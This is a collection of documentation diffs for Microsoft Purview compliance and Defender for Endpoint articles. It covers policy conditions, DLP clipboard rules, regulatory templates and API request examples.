selected from the Active Directory for your subscription. \| +\| Sender address \| Yes \| Address of one or more users or groups that sent the message to the user with a policy match, selected from the Active Directory for your subscription. \| \| CC and BCC addresses \| No \| Optional users or groups to be notified of the policy match, selected from the Active Directory for your subscription. \| \| Subject \| Yes \| Information that appears in the subject line of the message, supports text characters. \| \| Message body \| Yes \| Information that appears in the message body, supports text or HTML values. \| If you'd like to create more than a simple text-based email message for notifica ## Unresolve messages -When messages are resolved, they're removed from the Pending tab view and displayed in the Resolved tab. Investigation and remediation actions aren't available for messages in the Resolved view. However, there may be instances where you need to take additional action on a message that was mistakenly resolved or that needs further investigation after initial resolution. You can use the unresolve command feature move one or more messages from the Resolved view back to the Pending view. +When messages are resolved, they're removed from the Pending tab and displayed in the Resolved tab. Investigation and remediation actions aren't available for messages in the Resolved tab. However, there may be instances where you need to take additional action on a message that was mistakenly resolved or that needs further investigation after initial resolution. You can use the Unresolve command to move one or more messages from the Resolved tab back to the Pending tab. -Follow these steps to unresolve messages: +To unresolve a message: 1. Sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com) using credentials for a user assigned to the Communication Compliance Analysts or Communication Compliance Investigators role groups in your Microsoft 365 organization. 2. In the Microsoft Purview compliance portal, go to Communication compliance. -3. Select the Policies tab and then select a policy that contains the resolved alert message, double-click to open the Policy page. +3. Select the Policies tab, select a policy that contains the resolved message, and then double-click to open the Policy page. 4. On the Policy page, select the Resolved tab. -5. On the Resolved tab, select one or more messages to move back to Pending. -6. On the command bar, select Unresolve. -7. On the Unresolve item pane, add any comments applicable to the unresolve action and select Save to move the item back to Pending. +5. On the Resolved tab, select one or more messages. +6. Select Unresolve. +7. On the Unresolve item pane, add any applicable comments, and then select Save. 8. Select the Pending tab to verify the selected items are displayed.
compliance	Communication Compliance Policies	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-policies.md	f1.keywords: Previously updated : 06/20/2023 Last updated : 07/18/2023 audience: Admin f1_keywords: When configured for an insider risk management policy, a dedicated policy named Users that send 5 or more messages classified as potentially risky within 24 hours are automatically brought in-scope for insider risk management policies that include this option. Once in-scope, the insider risk management policy detects potentially risky activities configured in the policy and generates alerts as applicable. It may take up to 48 hours from the time risky messages are sent until the time a user is brought in-scope in an insider risk management policy. If an alert is generated for a potentially risky activity detected by the insider risk management policy, the triggering event for the alert is identified as being sourced from the communication compliance risky activity. -All users assigned to the [Insider Risk Management Investigators](/microsoft-365/compliance/insider-risk-management-plan#plan-for-the-review-and-investigation-workflow) role group are automatically assigned as reviewers in the dedicated communication compliance policy. If inside risk management investigators need to review the associated risky user alert directly on the communication compliance alerts page (linked from the insider risk management alert details), they must be manually added to the Communication Compliance Investigators role group. +All users assigned to the [Insider Risk Management Investigators](/microsoft-365/compliance/insider-risk-management-plan#plan-for-the-review-and-investigation-workflow) role group are automatically assigned as reviewers in the dedicated communication compliance policy. If insider risk management investigators need to review the associated risky user alert directly on the communication compliance alerts page (linked from the insider risk management alert details), they must be manually added to the Communication Compliance Investigators role group. Before integrating communication compliance with insider risk management, you should also consider the following guidance when detecting messages containing potentially inappropriate text: You have the option of including sensitive information types as part of your com - Custom information type > [!IMPORTANT] -> SITs have two different ways of defining the max unique instance count parameters. To learn more, see [Instance count supported values for SIT](/microsoft-365/compliance/create-a-custom-sensitive-information-type#instance-count-supported-values-for-sit). +> Sensitive info types have two different ways of defining the max unique instance count parameters. To learn more, see [Create custom sensitive information types](/microsoft-365/compliance/create-a-custom-sensitive-information-type#instance-count-supported-values-for-sit). -To learn more about sensitive information details and the patterns included in the default types, see [Sensitive information type entity definitions](/microsoft-365/compliance/sensitive-information-type-entity-definitions). +The communication compliance solution supports default sensitive information types as well as bundled named-entity sensitive information types, which are collections of sensitive information types. To learn more about sensitive information details and the patterns included in the default types, see [Sensitive information type entity definitions](/microsoft-365/compliance/sensitive-information-type-entity-definitions). For information on supported bundled named-entity sensitive information types, see the following: + +- [All credentials](sit-defn-all-creds.md) +- [All full names](sit-defn-all-full-names.md) +- [All medical terms and conditions](sit-defn-all-medical-terms-conditions.md) +- [All Physical Addresses](sit-defn-all-physical-addresses.md) ### Custom keyword dictionaries Images from 50 KB to 4 MB in the following image formats are scanned and process > [!NOTE] > Scanning and extraction for embedded and attached .pdf images is currently supported only for email messages. -When reviewing pending alerts for policies with OCR enabled, images identified and matched to policy conditions are displayed as child items for associated alerts. You can view the original image to evaluate the identified text in context with the original message. It may take up to 48 hours for detected images to be available with alerts. +When reviewing pending policy matches for policies with OCR enabled, images identified and matched to policy conditions are displayed as child items for associated alerts. You can view the original image to evaluate the identified text in context with the original message. It may take up to 48 hours for detected images to be available with alerts. ### Conditional settings The following table explains more about each condition. \|:--\|:--\| \| Content matches any of these classifiers \| Apply to the policy when any classifiers are included or excluded in a message. Some classifiers are pre-defined in your organization, and custom classifiers must be configured separately before they're available for this condition. Only one classifier can be defined as a condition in a policy. For more information about configuring classifiers, see [Learn about trainable classifiers](/microsoft-365/compliance/classifier-learn-about). \| \| Content contains any of these sensitive info types \| Apply to the policy when any sensitive information types are included or excluded in a message. Some classifiers are pre-defined in your tenant, and custom classifiers can be configured separately or as part of the condition assignment process. Each sensitive information type you choose is applied separately and only one of these sensitive information types must apply for the policy to apply to the message. For more information about custom sensitive information types, see [Learn about sensitive information types](/microsoft-365/compliance/sensitive-information-type-learn-about). \| -\| Message is received from any of these domains <br><br> Message is not received from any of these domains \| Apply the policy to include or exclude specific domains in received messages.<br><br> Make sure to use the following syntax when entering conditional text: <br><br>-Enter each domain and separate multiple domains with a comma.<br> -Do not include spaces between items separated by a comma.<br> -Remove all leading and trailing spaces.<br><br> Each domain entered is applied separately, only one domain must apply for the policy to apply to the message. If you want to use Message is received from any of these domains to look for messages from specific emails address you need to combine this with another condition like Message contains any of these words or Content matches any of these classifiers or you might get unexpected results. <br><br> If you want to scan all email from a specific domain, but want to exclude messages that don't need review (newsletters, announcements, and so on), you must configure a Message is not received from any of these domains condition that excludes the email address (example newsletter@contoso.com). \| +\| Message is received from any of these domains <br><br> Message is not received from any of these domains \| Apply the policy to include or exclude specific domains in received messages.<br><br> Make sure to use the following syntax when entering conditional text: <br><br>-Enter each domain and separate multiple domains with a comma.<br> -Do not include spaces between items separated by a comma.<br> -Remove all leading and trailing spaces.<br><br> Each domain entered is applied separately, only one domain must apply for the policy to apply to the message. If you want to use Message is received from any of these domains to look for messages from specific domains, you need to combine this with another condition like Message contains any of these words or Content matches any of these classifiers or you might get unexpected results. <br><br> If you want to scan all emails but want to exclude messages from a specific domain that don't need review (newsletters, announcements, and so on), you must configure a Message is not received from any of these domains condition that excludes the domain (example 'contoso.com,wingtiptoys.com'). \| +\| Message is received from any of these external email addresses <br><br> Message is not received from any of these external email addresses\|Apply the policy to include or exclude messages received or not received from specific external email addresses (example someone@outlook.com).<br><br>Use this condition to monitor only messages that come from outside the organization (messages that cross the firewall). \| +\| Message is sent to any of these external email addresses <br><br> Message is not sent to any of these external email addresses\|Apply the policy to include or exclude messages sent or not sent to specific external email addresses (example someone@outlook.com).<br><br>Use this condition to monitor only messages that are sent outside the organization (messages that cross the firewall).\| \| Message is sent to any of these domains <br><br> Message is not sent to any of these domains \| Apply the policy to include or exclude specific domains in sent messages.<br><br> Make sure to use the following syntax when entering conditional text: <br><br>-Enter each domain and separate multiple domains with a comma.<br> -Do not include spaces between items separated by a comma.<br> -Remove all leading and trailing spaces.<br><br>Each domain is applied separately; only one domain must apply for the policy to apply to the message. <br><br> If you want to exclude all emails sent to two specific domains, configure the Message is not sent to any of these domains condition with the two domains (example 'contoso.com,wingtiptoys.com'). \| \| Message is classified with any of these labels <br><br> Message is not classified with any of these labels \| To apply the policy when certain retention labels are included or excluded in a message. Retention labels must be configured separately and configured labels are chosen as part of this condition. Each label you choose is applied separately (only one of these labels must apply for the policy to apply to the message). For more information about retention labels, see [Learn about retention policies and retention labels](/microsoft-365/compliance/retention).\| \| Message contains any of these words <br><br> Message contains none of these words \| To apply the policy when certain words or phrases are included or excluded in a message.<br><br> Make sure to use the following syntax when entering conditional text: <br><br>- Remove all leading and trailing spaces.<br>- Add quotation marks before and after each keyword or key phrase.<br>- Separate each keyword or key phrase with a comma.<br>- Do not include spaces between items separated by a comma. <br><br>Example: "banker","insider trading","confidential 123"<br><br>Each word or phrase you enter is applied separately (only one word must apply for the policy to apply to the message). For more information about entering words or phrases, see the next section [Matching words and phrases to emails or attachments](#matching-words-and-phrases-to-emails-or-attachments).\|
compliance	Communication Compliance	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance.md	f1.keywords: Previously updated : 04/17/2023 Last updated : 07/18/2023 audience: Admin f1_keywords: Intelligent customizable templates in communication compliance allow you to appl Built-in remediation workflows allow you to quickly identify and take action on messages with policy matches in your organization. The following new features increase efficiency for investigation and remediation activities: - Flexible remediation workflow: New remediation workflow helps you quickly take action on policy matches, including new options to escalate messages to other reviewers and to send email notifications to users with policy matches.-- Conversation policy matching: Messages in conversations are grouped by policy matches to give you more visibility about how conversations relate to your communication policies. For example, conversation policy matching in the Pending Alerts view will automatically show all messages in a Teams channel that have matches for your communications policies for analyzing and mitigating potentially inappropriate messages. Other messages in conversations that don't match your communications policies wouldn't be displayed. +- Conversation policy matching: Messages in conversations are grouped by policy matches to give you more visibility about how conversations relate to your communication policies. For example, conversation policy matching in the Pending tab will automatically show all messages in a Teams channel that have matches for your communications policies for analyzing and mitigating potentially inappropriate messages. Other messages in conversations that don't match your communications policies wouldn't be displayed. - Keyword highlighting: Terms matching policy conditions are highlighted in the message text view to help reviewers quickly analyze and remediate policy alerts. - Optical character recognition (OCR): Check, detect, and investigate printed and handwritten text within images embedded or attached to email or Microsoft Teams chat messages. - New filters: Investigate and remediate policy alerts faster with message filters for several fields, including sender, recipient, date, domains, and many more. You can choose from the following policy templates in the Microsoft Purview comp In this step, you can look deeper into the issues detected as matching your communication compliance policies. This step includes the following actions available in the Microsoft Purview compliance portal: -- Alerts: When a message matches a policy condition, an alert is automatically generated. For each alert, you can see the status, the severity, the time detected, and if an eDiscovery (Premium) case is assigned and its status. New alerts are displayed on the communication compliance home page and the Alerts page and are listed in order of severity. +- Alerts: When a group of messages matches a policy condition, an alert is automatically generated. For each alert, you can see the status, the severity, the time detected, and if an eDiscovery (Premium) case is assigned and its status. New alerts are displayed on the communication compliance home page and the Alerts page and are listed in order of severity. - Issue management: For each alert, you can take investigative actions to help remediate the issue detected in the message. - Document review: During the investigation of an issue, you can use several views of the message to help properly evaluate the detected issue. The views include a conversation summary, text-only, and detail views of the communication conversation. - Reviewing user activity history: View the history of user message activities and remediation actions, such as past notifications and escalations, for policy matches. In this step, you can look deeper into the issues detected as matching your comm The next step is to remediate communication compliance issues you've investigated using the following options: -- Resolve: After reviewing an issue, you can remediate by resolving the alert. Resolving an alert removes it from the pending alert queue, and the action is preserved as an entry in the Resolved queue for the matching policy. Alerts are automatically resolved after marking the alert as misclassified, sending a notice to a user about the alert, or opening a new case for the alert. +- Resolve: After reviewing an issue, you can remediate by resolving the alert. Resolving an alert removes it from the Pending tab, and the action is preserved as an entry on the Resolved tab for the matching policy. Alerts are automatically resolved after marking the alert as misclassified, sending a notice to a user about the alert, or opening a new case for the alert. - Tag a message: As part of the resolution of an issue, you can tag the detected message as compliant, non-compliant, or as questionable as it relates to the policies and standards for your organization. Tagging can help you micro-filter policy alerts for escalations or as part of other internal review processes. - Notify the user: Often, users accidentally or inadvertently violate a communication compliance policy. You can use the notify feature to provide a warning notice to the user and to resolve the issue. - Escalate to another reviewer: Sometimes, the initial reviewer of an issue needs input from other reviewers to help resolve the incident. You can easily escalate message issues to reviewers in other areas of your organization as part of the resolution process.
compliance	Compliance Manager Templates List	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-manager-templates-list.md	f1.keywords: Previously updated : 05/04/2023 Last updated : 07/18/2023 audience: Admin The regulatory templates listed below may be purchased by your organization. Cer - [CIS Implementation Group 1, Group 2, Group 3](/compliance/regulatory/offering-cis-benchmark) - CIS Microsoft 365 Foundation Level 1 and 2 - [Cloud Security Alliance (CSA) Cloud Controls Matrix (CCM)](/compliance/regulatory/offering-csa-star-attestation)-- COBIT 5 +- COBIT 5 - FINRA Cybersecurity Checklist - ITU X.1052 Information Security Management Framework - Joint Commission Information Management Standard The regulatory templates listed below may be purchased by your organization. Cer - Bosnia and Herzegovina Law on the Protection of Personal Data - Botswana - Data Protection Act - Bulgaria Law for Protection of Personal Data 2002 -- Central Bank of Kuwait Cybersecurity Framework +- Central Bank of Kuwait Cybersecurity Framework +- Corporate Sustainability Reporting Directive (CSRD) - Cyprus The Processing of Personal Data Law - Czech - Act No. 110/2019 Coll. on Personal Data Processing - 2019 - Czech - On Cyber Security and Change of Related Acts (Act on Cyber Security) - Act No. 181 The regulatory templates listed below may be purchased by your organization. Cer - Estonia - Personal Data Protection Act - Estonia - The system of security measures for information systems - EU - Directive 2006/24/EC -- EU - ePrivacy Directive 2002 58 EC +- EU - ePrivacy Directive 2002 58 EC +- [EU GDPR (General Data Protection Regulation)](/compliance/regulatory/gdpr) - EudraLex - The Rules Governing Medicinal Products in the European Union - European Network and Information Security Agency (ENISA) - Cloud Computing Information Assurance Framework - Finland - Data Protection Act
compliance	Compliance Manager Whats New	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-manager-whats-new.md	f1.keywords: Previously updated : 05/23/2023 Last updated : 07/18/2023 audience: Admin description: "Find out whatΓÇÖs new in Compliance Manger and whatΓÇÖs to come. R [!INCLUDE [purview-preview](../includes/purview-preview.md)] +## June 2023 + +Compliance Manager has published the following new regulatory template: + +- Corporate Sustainability Reporting Directive (CSRD) + +View our [full list of regulatory templates](compliance-manager-templates-list.md). + ## May 2023 Compliance Manager now integrates with Microsoft Defender for Cloud so you can assess your compliance posture across Microsoft 365, Microsoft Azure, Google Cloud Platform (GCP), and Amazon Web Services (AWS) with resource-level testing and cloud-specific guidance. This new integration provides customers with a single interface in Compliance Manager to help make it easier to manage compliance across the organizationΓÇÖs digital estate. Learn more about [multicloud support in Compliance Manager](compliance-manager-multicloud.md).
compliance	Data Classification Activity Explorer Available Events	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/data-classification-activity-explorer-available-events.md	This event is generated each time an unlabeled document is labeled or an email i \|Source \|Reported in Activity explorer \| Note \| \|\|\|\| \| Word, Excel, PowerPoint\|Yes \| -\|Outlook\| Yes \| \| +\|Outlook\| Yes \| If a sensitivity label has been applied to any email in an email thread, the same label will be automatically applied to subsequent replies on the thread. These labeling events appear in activity explorer as automatic labeling events, even when automatic labeling has not ben configured.\| \|SharePoint online, OneDrive\|Yes \| \| \|Exchange \|Yes \| \| \|Azure Information Protection (AIP) unified client and AIP unified scanner \|Yes \|The AIP new label action is mapped to label applied in Activity explorer \|
compliance	Dlp Exchange Conditions And Actions	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-exchange-conditions-and-actions.md	To configure the sender address location at a DLP rule level, the parameter is * \|Subject contains words or phrases\|condition: SubjectContainsWords <br/> exception: ExceptIf SubjectContainsWords\|Words\|Messages that have the specified words in the Subject field.\| \|Subject matches patterns\|condition: SubjectMatchesPatterns <br/> exception: ExceptIf SubjectMatchesPatterns\|Patterns\|Messages where the Subject field contain text patterns that match the specified regular expressions.\| \|Content contains\|condition: ContentContainsSensitiveInformation <br/> exception ExceptIfContentContainsSensitiveInformation\|SensitiveInformationTypes\|Messages or documents that contain sensitive information as defined by Microsoft Purview Data Loss Prevention (DLP) policies.\| +\|Content is not labeled\|condition: ContentIsNotLabeled <br/> exception ExceptIfContentIsNotLabeled\|Sensitivity Labels\|Messages where neither the email nor the attached documents contain any sensitivity labels as defined by Microsoft Purview Data Loss Prevention (DLP) policies.\| \|Subject or Body matches pattern\|condition: SubjectOrBodyMatchesPatterns <br/> exception: ExceptIfSubjectOrBodyMatchesPatterns\|Patterns\|Messages where the subject field or message body contains text patterns that match the specified regular expressions.\| \|Subject or Body contains words\|condition: SubjectOrBodyContainsWords <br/> exception: ExceptIfSubjectOrBodyContainsWords\|Words\|Messages that have the specified words in the subject field or message body\|
compliance	Dlp Spo Odbweb Policy Tips	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-spo-odbweb-policy-tips.md	f1.keywords: Previously updated : 06/26/2023 Last updated : 07/18/2023 audience: Admin search.appverid: MET150 Yes. > [!IMPORTANT] > When emails are encrypted with Microsoft Purview Message Encryption and the policy used to detect them uses the detect encryption condition policy tips will not appear. +For more information on blocking and notifications in SharePoint Online and OneDrive for Business, see [Blocking and notifications in SharePoint Online and OneDrive for Business](dlp-policy-reference.md#blocking-and-notifications-in-sharepoint-online-and-onedrive-for-business). + ## Conditions that support policy tips in SharePoint Online and OneDrive for Business web client - Content contains Yes. ## Actions that support policy tips in SharePoint Online and OneDrive for Business web client -- Restrict acces or encrypt the ocntent in Microsoft 365 locations +- Restrict acces or encrypt the content in Microsoft 365 locations ## Sensitive information types that support policy tips in SharePoint Online and OneDrive for Business web client
compliance	Endpoint Dlp Learn About	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-learn-about.md	f1.keywords: Previously updated : 06/24/2023 Last updated : 07/18/2023 audience: ITPro f1_keywords: Endpoint DLP enables you to audit and manage the following types of activities u \|Activity \|Description \|Windows 10 1809 and later/ Windows 11\| macOS three latest released versions \| Auditable/restrictable\| \|\|\|\|\|\| \|Upload to cloud service, or access by unallowed browsers \| Detects when a user attempts to upload an item to a restricted service domain or access an item through a browser. If they're using a browser that is listed in DLP as unallowed, the upload activity is blocked and the user is redirected to use Microsoft Edge. Microsoft Edge then either allows or blocks the upload or access based on the DLP policy configuration. You can block, warn, or audit when protected files are allowed to be uploaded or prevented from being uploaded to cloud services based on the allow/unallowed domains list in Global settings. When the configured action is set to warn or block, other browsers (defined on the unallowed browsers list under Global settings) are blocked from accessing the file. \|Supported \|Supported\|Auditable and restrictable\| -\|Copy to another app \|Detects when a user attempts to copy information from a protected item and then paste it into another app, process, or item. It also detects when a user copies and pastes content among files within the same app, process, or item for Word, Excel, and PowerPoint.\|Supported\|Supported \| Auditable and restrictable\| \|Copy to USB removable media \|When this activity is detected, you can block, warn, or audit the copying or moving of protected files from an endpoint device to USB removable media.\|Supported\|Supported \|Auditable and restrictable\| \|Copy to a network share \| When this activity is detected, you can block, warn, or audit the copying or moving of protected files from an endpoint device to any network share. \|Supported\|Supported \|Auditable and restrictable\| \|Print a document \|When this activity is detected, you can block, warn, or audit the printing of protected files from an endpoint device. \|Supported\|Supported\|Auditable and restrictable \| Endpoint DLP enables you to audit and manage the following types of activities u \|Copy to a Bluetooth device\|Detects when a user attempts to copy an item to an unallowed Bluetooth app (as defined in the list of unallowed Bluetooth aps in Endpoint DLP settings).\|Supported\|Supported (preview)\| Auditable and restrictable\| \|Create an item\|Detects the creation of an item.\|Supported \|Supported \|Auditable\| \|Rename an item\|Detects the renaming of an item.\|Supported \|Supported \|Auditable\| -\|Copy to clipboard\| When this activity is detected, you can block, warn, or audit the copying of protected files to a clipboard on an endpoint device. \|Supported \| Supported\|Auditable and restrictable\| +\|Copy to clipboard\| When this activity is detected, you can block, block with override, or audit the copying of protected files to a clipboard on an endpoint device. If the rule is configure to Block or Block with override copying is blocked when the source content is sensitive except when the destination is within the same Microsoft 365 Office app\|Supported \| Supported\|Auditable and restrictable\| \|Access by unallowed apps\| Detects when an application that is on the unallowed apps list (as defined in [restricted apps and app groups](dlp-configure-endpoint-settings.md)) attempts to access protected files on an endpoint device. \|Supported \|Supported\| +### Copy to clipboard behavior + +When you configure a rule to Block or Block with override when a user attempts the Copy to clipboard activity on a file that matches the policy, end users see this behavior with these configurations: + +- Word file 123 contains sensitive information that matches the copy to clipboard Block rule. +- Excel file 123 contains sensitive information that matches the copy to clipboard Block rule. +- PowerPoint file 123 contains sensitive information that matches the copy to clipboard Block rule. + +- Word file 789 doesn't contain sensitive information. +- Excel file 789 doesn't contain sensitive information. +- PowerPoint file 789 doesn't contain sensitive information. + +- Notepad (or any non Microsoft Office based app or process) file XYZ contains sensitive information that matches the copy to clipboard Block rule. +- Notepad (or any non Microsoft Office based app or process) file ABC doesn't contain sensitive information. + +\|Source \|Destination \|Behavior \| +\|\|\|\| +\|Word file 123/Excel file 123/PowerPoint file 123 \|Word file 123/Excel file 123/PowerPoint file 123 \|copy and paste are allowed, in other words intra file copy and paste is allowed. \| +\|Word file 123/Excel File 123/PowerPoint file 123 \|Word file 789/Excel file 789/PowerPoint file 789 \|copy and paste are blocked, in other words inter file copy and paste is blocked. \| +\|Word file 789/Excel file 789/PowerPoint file 789 \|Word file 123/Excel File 123/PowerPoint file 123 \|copy and paste are allowed\| +\|Word file 123/Excel file 123/PowerPoint file 123 \|Notepad file ABC \|copy and paste are blocked \| +\|Notepad file XYZ \| any \| copy is blocked\| +\|Notepad file ABC \| any \| copy and paste are allowed\| + ## Best practice for endpoint DLP policies -Say you want to block all items that contain credit card numbers from leaving endpoints of Finance department users. We recommend the following: +Say you want to block all items that contain credit card numbers from leaving endpoints of Finance department users. We recommend: - Create a policy and scope it to endpoints and to that group of users. - Create a rule in the policy that detects the type of information that you want to protect. In this case, set content contains to Sensitive information type, and select Credit Card. If the extension is changed only to supported file extensions: ### File types -File types are a grouping of file formats. They are utilized to protect specific workflows or areas of business. You can use one or more file types as conditions in your DLP policies. +File types are a grouping of file formats. They're utilized to protect specific workflows or areas of business. You can use one or more file types as conditions in your DLP policies. \| File Type \| Apps \| Monitored file extensions \| \| \| -- \| --\| Onboarding and offboarding are handled via scripts that you download from the de Use the procedures in [Getting started with Microsoft 365 Endpoint DLP](endpoint-dlp-getting-started.md) to onboard devices. -If you have onboarded devices through [Microsoft Defender for Endpoint](../security/defender-endpoint/configure-machines-onboarding.md), those devices will show up automatically in the list of devices. This is because onboarding to Defender also onboards devices to DLP. You only need to Turn on device monitoring* to use endpoint DLP. +If you have onboarded devices through [Microsoft Defender for Endpoint](../security/defender-endpoint/configure-machines-onboarding.md), those devices show up automatically in the list of devices. This is because onboarding to Defender also onboards devices to DLP. You only need to Turn on device monitoring to use endpoint DLP. > [!div class="mx-imgBorder"] > ![managed devices list.](../media/endpoint-dlp-learn-about-2-device-list.png)
compliance	Whats New	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/whats-new.md	f1.keywords: Previously updated : 07/17/2023 Last updated : 07/18/2023 audience: Admin Whether it be adding new solutions to the [Microsoft Purview compliance portal]( ## July 2023 +### Communication compliance + +- Support for advanced sensitive info types: Communication compliance now [supports four advanced sensitive information types](communication-compliance-policies.md#sensitive-information-types): All credentials, All full names, All medical terms and conditions, and All physical addresses. +- New conditions: [Use the following new conditions to monitor communications that cross the firewall](communication-compliance-policies.md#conditional-settings): + - Message is received from any of these external email addresses + - Message is not received from any of these external email addresses + - Message is sent to any of these external email addresses + - Message is not sent to any of these external email addresses +- New Policy settings button: [View policy settings without opening a policy](communication-compliance-investigate-remediate.md). +- New Filter bar: [Key filters (Body/Subject, Date, Sender, and Tags) are always displayed](communication-compliance-investigate-remediate.md#using-filters) to make it easier to filter. + +### Insider risk management + +- In preview: [Bring your own detections (BYOD)](import-insider-risk-indicators.md). Use the new BYOD detections feature to import third-party insider risk detections and create custom indicators. +- Save a view of a filter in the Activity explorer: If you create a filter and customize columns for the filter, [save a view of your changes to quickly apply again later](insider-risk-management-activities.md#). +- Support for virtualized environments: Insider risk management now [supports virtualized environments through endpoint DLP](insider-risk-management-settings-policy-indicators.md#enable-device-indicators-and-onboard-windows-devices). +- General availability (GA): + - [Import physical badging data connector](import-physical-badging-data.md) + - [Identify priority physical assets setting](insider-risk-management-settings-priority-physical-assets.md) +- Additional templates for browser signal detection: [Browser signal detection is now used for the Data theft by departing users, Data leaks, and Risky browser usage (preview) templates](insider-risk-management-browser-support.md). +- Update for the [maximum size of a priority user group](insider-risk-management-settings-priority-user-groups.md#create-a-priority-user-group). + ### Sensitivity labels - General availability (GA): [Support for administrative units](get-started-with-sensitivity-labels.md#support-for-administrative-units). Whether it be adding new solutions to the [Microsoft Purview compliance portal]( ## June 2023 +### Communication compliance + +- Update to note that for the Export option in detailed reports, [the items and actions displayed are only for the items and actions matched during the date range included in the date range filter](communication-compliance-reports-audits.md#detailed-reports). + ### Compliance Manager - Update to clarify that some [automatically tested actions](compliance-manager-improvement-actions.md#testing-work) might show a status of "Out of scope" within the first 24 hours of setup with Microsoft Defender for Cloud monitoring.
includes	Defender M3d Techcommunity	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/defender-m3d-techcommunity.md	> [!TIP] -> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft 365 Defender Tech Community](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/bg-p/MicrosoftThreatProtectionBlog). +> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft 365 Defender Tech Community](https://techcommunity.microsoft.com/t5/microsoft-365-defender/bd-p/MicrosoftThreatProtection).
includes	Defender Mde Techcommunity	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/defender-mde-techcommunity.md	+ + Title: Microsoft Defender for Endpoint tech community +description: Microsoft 365 Defender tech community engagement. Last updated : 07/21/2023++++++++ +> [!TIP] +> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft Defender for Endpoint Tech Community](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bd-p/MicrosoftDefenderATP).
security	Get Agent Details	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/Get-agent-details.md	GET https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanAgents/7 } ```
security	Get Scan History By Definition	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/Get-scan-history-by-definition.md	POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit } ```
security	Get Scan History By Session	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/Get-scan-history-by-session.md	POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit ] } ```
security	Access Mssp Portal	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/access-mssp-portal.md	Use the following steps to obtain the MSSP customer tenant ID and then use the I - [Grant MSSP access to the portal](grant-mssp-access.md) - [Configure alert notifications](configure-mssp-notifications.md) - [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security	Add A New Scan Definition	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/add-a-new-scan-definition.md	POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit "ScanDefinitionIds": ["td32f17af-5cc2-4e4e-964a-4c4ef7d216e2", "ab32g20af-5dd2-4a5e-954a-4c4ef7d216e2"], } ```
security	Add Or Remove Machine Tags	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/add-or-remove-machine-tags.md	POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2 ``` To remove machine tag, set the Action to 'Remove' instead of 'Add' in the request body.
security	Add Or Remove Multiple Machine Tags	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/add-or-remove-multiple-machine-tags.md	POST https://api.securitycenter.microsoft.com/api/machines/AddOrRemoveTagForMult ``` To remove machine tags, set the Action to 'Remove' instead of 'Add' in the request body.
security	Admin Submissions Mde	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/admin-submissions-mde.md	The submission is available on the Files tab of the Submissions page at - [Microsoft Defender for Endpoint in Microsoft 365 Defender](../defender/microsoft-365-security-center-mde.md) - [Address false positives/negatives](defender-endpoint-false-positives-negatives.md) - [View and organize alerts queue in Microsoft Defender for Endpoint](alerts-queue.md)
security	Advanced Features	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/advanced-features.md	Backup quarantined files in a secure and compliant location so they can be downl - [Update data retention settings](data-retention-settings.md) - [Configure alert notifications](configure-email-notifications.md)
security	Alerts Queue Endpoint Detection Response	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts-queue-endpoint-detection-response.md	Topic\|Description [Investigate an IP address](investigate-ip.md)\|Examine possible communication between devices in your network and external internet protocol (IP) addresses. [Investigate a domain](investigate-domain.md)\|Investigate a domain to see if devices and servers in your network have been communicating with a known malicious domain. [Investigate a user account](investigate-user.md)\|Identify user accounts with the most active alerts and investigate cases of potential compromised credentials.
security	Alerts Queue	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts-queue.md	You can choose to filter the alerts based on their Automated investigation state - [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md) - [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md) - [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security	Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts.md	GET https://api.securitycenter.microsoft.com/api/alerts/da637472900382838869_136 ## Related articles [Use the Microsoft Graph security API - Microsoft Graph \| Microsoft Learn](/graph/api/resources/security-api-overview)
